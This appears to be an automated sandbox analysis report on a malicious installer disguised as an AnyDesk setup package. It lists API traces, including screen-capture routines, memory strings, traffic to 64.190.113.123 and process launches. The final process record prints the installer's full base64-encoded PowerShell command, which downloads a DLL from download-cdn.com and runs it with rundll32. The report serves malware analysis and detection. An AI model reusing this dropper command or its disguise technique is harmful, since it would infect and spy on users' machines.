Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 7_2_04A07390 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 7_2_04A07750 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose, | 7_2_04A03AA0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose, | 7_2_04A03D50 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 9_2_00FC7750 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose, | 9_2_00FC3AA0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose, | 9_2_00FC7390 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose, | 9_2_00FC3D50 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: powershell.exe, 00000004.00000002.380126921.0000011A282AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: powershell.exe, 00000004.00000002.350417258.0000011A112A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://download-cdn.com |
Source: powershell.exe, 00000004.00000002.376308789.0000011A201BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0C |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0X |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.350417258.0000011A10161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://t2.symcb.com0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0 |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: http://tl.symcd.com0& |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.350417258.0000011A10361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A10161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A1128E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://download-cdn.com |
Source: powershell.exe, 00000004.00000002.350417258.0000011A11207000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://download-cdn.com/download.php?f=Ldrp.d |
Source: powershell.exe, 00000004.00000002.350417258.0000011A10361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A11207000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://download-cdn.com/download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi |
Source: rundll32.exe, 00000007.00000002.380471094.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 00000009.00000002.402040260.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 0000000B.00000002.846933227.000000001001D000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://download-cdn.com/pload/ |
Source: rundll32.exe, 00000007.00000002.380471094.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 00000009.00000002.402040260.000000001001D000.00000004.00000001.01000000.00000008.sdmp, rundll32.exe, 0000000B.00000002.846933227.000000001001D000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://download-cdn.com/pload/SOFTWARE |
Source: powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.350417258.0000011A10DC6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr | String found in binary or memory: https://litesoft.com/ARPURLINFOABOUTARPURLUPDATEINFOButtonText_Repair&RepairAiPreferFastOem1ProductL |
Source: powershell.exe, 00000004.00000002.376308789.0000011A201BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.350417258.0000011A106B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: https://www.advancedinstaller.com |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: https://www.thawte.com/cps0/ |
Source: AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr | String found in binary or memory: https://www.thawte.com/repository0W |
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702 |
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: unknown | TCP traffic detected without corresponding DNS query: 64.190.113.123 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A0A850 GetDC,GetDC,CreateCompatibleDC,SelectObject,SelectObject,CreateCompatibleBitmap,SelectObject,SelectObject,CreateSolidBrush,SelectObject,Rectangle,GetDC,BitBlt,GetTopWindow,GetWindow,GetWindow,IsWindowVisible,GetWindowRect,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,PrintWindow,BitBlt,DeleteObject,DeleteDC,GetWindow,GetClassNameW,lstrcmpW,GetWindowLongA,SetWindowLongA,GetWindow,SelectObject,Rectangle,VirtualFree,VirtualFree,VirtualFree,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDC,VirtualAlloc,GetDIBits, | 7_2_04A0A850 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6D5EC0 | 3_2_00007FF7AF6D5EC0 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF7150CC | 3_2_00007FF7AF7150CC |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF720018 | 3_2_00007FF7AF720018 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6EC8D0 | 3_2_00007FF7AF6EC8D0 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF71A864 | 3_2_00007FF7AF71A864 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E209C | 3_2_00007FF7AF6E209C |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF718FF8 | 3_2_00007FF7AF718FF8 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6F870C | 3_2_00007FF7AF6F870C |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF720DB4 | 3_2_00007FF7AF720DB4 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E5574 | 3_2_00007FF7AF6E5574 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF7155C4 | 3_2_00007FF7AF7155C4 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF725604 | 3_2_00007FF7AF725604 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E6606 | 3_2_00007FF7AF6E6606 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF711578 | 3_2_00007FF7AF711578 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E7C4C | 3_2_00007FF7AF6E7C4C |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF7174E0 | 3_2_00007FF7AF7174E0 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E4444 | 3_2_00007FF7AF6E4444 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF713424 | 3_2_00007FF7AF713424 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E3330 | 3_2_00007FF7AF6E3330 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6D7B30 | 3_2_00007FF7AF6D7B30 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6E93FC | 3_2_00007FF7AF6E93FC |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF725388 | 3_2_00007FF7AF725388 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6DCA70 | 3_2_00007FF7AF6DCA70 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF6F7A64 | 3_2_00007FF7AF6F7A64 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF7111A4 | 3_2_00007FF7AF7111A4 |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF71194C | 3_2_00007FF7AF71194C |
Source: C:\Windows\Installer\MSI5344.tmp | Code function: 3_2_00007FF7AF71B994 | 3_2_00007FF7AF71B994 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF815F80D81 | 4_2_00007FF815F80D81 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF815F80DAA | 4_2_00007FF815F80DAA |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF815F80CA8 | 4_2_00007FF815F80CA8 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100026B0 | 7_2_100026B0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A09AC0 | 7_2_04A09AC0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A0DF70 | 7_2_04A0DF70 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A0B978 | 7_2_04A0B978 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_04A0D54F | 7_2_04A0D54F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FC9AC0 | 9_2_00FC9AC0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FCB978 | 9_2_00FCB978 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FCDF70 | 9_2_00FCDF70 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00FCD54F | 9_2_00FCD54F |
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi" | |
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V | |
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B | |
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== | |
